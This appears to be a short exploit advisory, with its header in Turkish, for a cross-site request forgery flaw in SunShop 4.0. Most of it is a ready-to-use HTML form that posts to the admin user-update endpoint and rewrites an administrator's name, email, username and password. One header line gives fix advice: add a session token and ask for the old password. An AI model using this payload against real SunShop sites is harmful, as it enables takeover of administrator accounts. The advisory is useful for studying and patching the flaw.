< ------------------- header data start ------------------- >

#############################################################

# Application Name : SUNSHOP

# Version : 4.0

# vulnerable Type : XSRF

# Infection : Admin Bilgileri Degistirilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli,Eski sifre sorulmalidir ..

# author : CWH1RLPOOL ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://www.site.com/[path]//admin/adminindex.php?action=users&type=admin&sub=update method=post >
<input type=hidden name=id value=4 />
<input type=hidden name=olduserid value= />
<input id=name type=text name=name value=Test Admin size=35 class=input_box style= tabindex=1 />
<input id=email type=text name=email value=[email protected] size=35 class=input_box style= tabindex=2 />
<input id=username type=text name=username value=demoadmin size=12 class=input_box style= tabindex=3 />
<input id=password type=text name=password value= size=12 class=input_box style= tabindex=4 />
<input type=submit name=Submit value=Edit class=submit_button tabindex= />
</form>
< -- bug code end of -- >